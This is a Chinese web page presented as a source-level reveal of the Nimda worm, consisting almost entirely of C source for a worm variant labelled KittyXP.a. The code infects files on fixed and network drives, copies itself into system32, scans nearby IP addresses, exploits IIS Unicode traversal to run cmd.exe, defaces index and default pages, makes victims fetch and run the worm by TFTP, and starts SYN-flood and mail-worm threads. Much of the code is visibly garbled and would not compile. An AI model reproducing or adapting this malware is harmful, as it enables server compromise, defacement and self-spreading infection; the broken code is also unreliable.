网络安全 频道

Nimda源代码级揭秘

if (FindResult.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
char * DirName;

DirName = _strupr(_strdup(FindResult.cFileName));
if (
(memcmp(DirName, "SYSTEM", 6)) // Skip SYSTEM??
&&
(FindResult.cFileName[0] != ''''.'''') // Skip loops with "." and ".."
)
{
SearchFiles(FindResult.cFileName);
}
free(DirName);
}
}
while (FindNextFile(FindHandle, &FindResult));
}
FindClose(FindHandle);
}
}


/////////////////////////////////////////////
// Search fixed and network drives to infect
/////////////////////////////////////////////
DWORD WINAPI SearchDrives()
{
DWORD Drives;
BYTE CurrentDrive[] = "A:\\";
DWORD DriveType;
BYTE i;

Drives = GetLogicalDrives();
for (i=0; i {
if (Drives & (1< {
CurrentDrive[0] = ''''A'''' + i;
DriveType = GetDriveType(CurrentDrive);
// Only infect files in Fixed and Network Drives
if ((DriveType == DRIVE_FIXED) || (DriveType == DRIVE_REMOTE))
{
SearchFiles(CurrentDrive);
}
}
}
return 1;
}


///////////
// Payload
///////////
int MyMessageBox(HWND hWnd, LPSTR Text, LPSTR Caption, UINT Type)
{
char * Msgs[] =
{
"我爱你张一",
"KittyXP.a by Squirrel in china",
"我爱你张一",
"我爱你张一"
};
static int i = 0;

return MessageBoxA(hWnd, Text, Msgs[++i & 3], Type);
}


// Simulated host for 1st generation
void Gen1()
{
MyMessageBox(NULL, "", NULL, MB_OK);
}

file://程序入口

int main(int argc, char *argv[])
{
HANDLE hThread=NULL;
DWORD dwThreadID;
HANDLE hThread1=NULL;
HANDLE idpthread;
DWORD dwThreadID1;
HANDLE iis4thread;
DWORD dwThreadID2;
HANDLE xpmethread;
DWORD dwThreadID3;
HANDLE anitthd;
DWORD dwThreadID4;
DWORD dwThreadID0;
handle synflood
dword synfloodid
long PreviousCount;
handle pevr
dword pevrid
handle mailworm
dword wormid
pevr=CreateThread(NULL,0,pevirus,argv,0,&pevrid)//调用病毒部分
CreateThread(NULL,0,TFTP32,0,0,&dwthreadid0)//开始tftp32
mailworm=CreateThread(NULL,0,worm,argv,0,&wormid)//调用蠕虫部分
//CurVerInfo.dwOSVersionInfoSize = sizeof(CurVerInfo);
//GetVersionEx(&CurVerInfo);
HKEY KittyXP.aInstallKey,KittyXP.aNewKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\KittyXP.a\\Install",0,KEY_ALL_ACCESS,&KittyXP.aInstallKey)==ERROR_SUCCESS)
{
HMODULE g_module=NULL
char svFileName[512]
g_module=GetModuleHandle(NULL)
GetModuleFileName(g_module,svFileName,512)
char systemdir[512]
GetSystemDirectory(systemdir,512)
lstrcat(systemdir,"\\ssrv.exe")
CopyFile(svFileName,systemdir,false)
mailworm=CreateThread(NULL,0,worm,argv,0,&wormid)//调用蠕虫部分
WaitForSingleObject(mailworm, INFINITE)
CloseHandle(mailworm)
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\KittyXP.a\\Install",&KittyXP.aNewKey);
RegCloseKey(KittyXP.aNewKey);
}
int i;
int StartNet;
int StopNet;
int StartHost;//IP段开始
int StopHost;//IP段结束

WSADATA wsaData;
struct in_addr host;

WSAStartup(0x202, &wsaData );
StartNet=GetLocalIP();
StopNet=GetLocalIP()+100;
StartHost=ntohl(StartNet);
StopHost=ntohl(StopNet);
WSACleanup();
do
{

host.S_un.S_addr = inet_addr(argv[1]);
WSAStartup(0x202, &wsaData );

hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
if(hSemaphore==NULL)
{

//printf("\nCreateSemaphore failed:%d",GetLastError());
file://__leave;
}

for(i=StartHost;i<=StopHost;i++)
{
hThread=CreateThread(NULL,0,FindExeDir,(LPVOID)i,0,&dwThreadID);
idpthread=CreateThread(NULL,0,redcode,(LPVOID)i,0,&dwThreadID1);
iis4thread=CreateThread(NULL,0,iis4,(LPVOID)i,0,&dwThreadID2);
xpmethread=CreateThread(NULL,0,xpmethd,(LPVOID)i,0,&dwThreadID3);
anitthd=CreateThread(NULL,0,anitthd,(LPVOID)i,0,&dwThreadID3);
synflood=CreateThread(NULL,0,flood,0,0,&synfloodid)
if((hThread==NULL) or (idpthread==null) or (iis4thread==null) or (xpmethread==null) or (anitthd==null) or (synflood==null))

{
//printf("\nCreate thread failed:%d",GetLastError());
break;
}
//printf(".");
Sleep(10);
CloseHandle(hThread);
CloseHandle(idpthread)
CloseHandle(xpmethread)
CloseHandle(iis4thread)
CloseHandle(anitthd)
CloseHandle(synflood)
WaitForSingleObject(hSemaphore,INFINITE);
}
while(1)
{
WaitForSingleObject(hSemaphore,INFINITE);
if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
{
//printf("\nmain() ReleaseSemaphore failed:%d",GetLastError());
Sleep(5000);
break;
}
if(PreviousCount==(MaxThread-1))
{
//printf("\nAll done.");
break;
}
Sleep(500);
}

// printf("发现可执行目录. [%s]\n", exedir);
// printf("可执行目录是 [%s]\n",localpath);


CloseHandle(hSemaphore);

WSACleanup();


}
while((argc=2)or (argc>2)or (argc<2));//死循环

return 0;
}

long GetLocalIP(void)
{
char szName[128];
int i;
PHOSTENT pHost;
gethostname(szName, 128);
//printf("%s\n",szName);
pHost = gethostbyname(szName);
if( NULL == pHost )// failed
return 0;
for(i=0;pHost->h_addr_list[i]!=NULL;i++)
//printf("%s\n",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));
}


DWORD WINAPI FindExeDir(LPVOID lp)
{
int host=(int)lp;
u_short port=80;
int SockFD,i;
struct sockaddr_in DstSAin;
char waste[500],uniwaste[500];
char *buffer,*p;
char space[3];
char dletter[2];//磁盘路径
char asc[3];
int rbytes=0,loc1=0,loc2=0;
char locdir[300];
int exenum=0;
crack:
memset(locdir,0,300);
memset(uniwaste,0,499);
memset(space,0,3);
strcpy(space,"%20");
memset(asc,0,3);
strcpy(asc,"%3E");
//printf("查找漏洞%d...\n",host);

for(i=0;i<8;i++)
{
strcat(uniwaste,"..");
strcat(uniwaste,hole[num]); file://把unicode码和URL结合起来.
}

memset(waste,0,500);
file://create our string that sees if we can execute cmd.exe
file://that way we know if a directory is executable and if the exe dir is on the same harddrive as cmd.exe
sprintf(waste,"GET /%s/%s/winnt/s, ystem32/cmd.exe?/c%sdir HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("Trying directory [%s]\n", waste);
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Directory of"); file://找到了cmd.exe的目录!!!
if(p!=NULL)
{

loc1=p-buffer+1;
p=strstr(buffer,"
");
if(p!=NULL)
{
loc2=p-buffer+1;
loc2=loc2-27;
buffer[loc2-2]=''''\0'''';
strncpy(locdir,buffer+loc1+12,290);
file://Set executable directory.
exedir=malloc(strlen(ExeDirs[exenum])+1);
memset(exedir,0,strlen(ExeDirs[exenum])+1);
memcpy(exedir,ExeDirs[exenum],strlen(ExeDirs[exenum]));
file://Set executable directory path
localpath=malloc(strlen(locdir)+1);
memset(localpath,0,strlen(locdir)+1);
memcpy(localpath,locdir,strlen(locdir));
closesocket(SockFD);
file://查询首页位置

memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sset HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{

send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
WebPath=find(buffer,"PATH_TRANSLATED=");//上面通过cmd.exe?/c set命令显示主机配置
file://从中找到WEB目录,用来修改首页
closesocket(SockFD);
strncpy(dletter,localpath,1);
dletter[1]=''''\0'''';
//printf("首页路径%s\n",WebPath);
}

memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一default.asp>+%s\\default.asp HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("修改首页default.asp \n");
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
// printf("Access is denied");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一index.asp>+%s\\index.asp HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("修改首页index.asp \n");
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
//printf("不能修改,文件属性有问题");
}
closesocket(SockFD);
}


memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一index.html>+%s\\index.html HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("修改首页index.html \n");
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p=NULL)
{
//printf("不能修改,文件属性有问题");
}
closesocket(SockFD);
}

memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一default.htm>+%s\\default.htm HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("修改首页default.htm \n");
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
//printf("不能修改,文件属性有问题");
}
closesocket(SockFD);
}

memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%s+TFTP%20-i%20"&GetLocalIP()&"%20Get%20ssrv.exe%20%ssrv.exe HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("正在上传自身")
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
//printf("system32不允许写操作");
}
closesocket(SockFD);
}
file://运行
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%ssrv.exe HTTP/1.0\n\n",ExeDirs[exenum],uniwaste);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("在主机上运行自己 \n");
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"CGI Error");
if(p!=NULL)
{
// printf("运行成功");//此时存在漏洞的主机开始扫描自己IP段附近的漏洞主机
}
closesocket(SockFD);
}
0
相关文章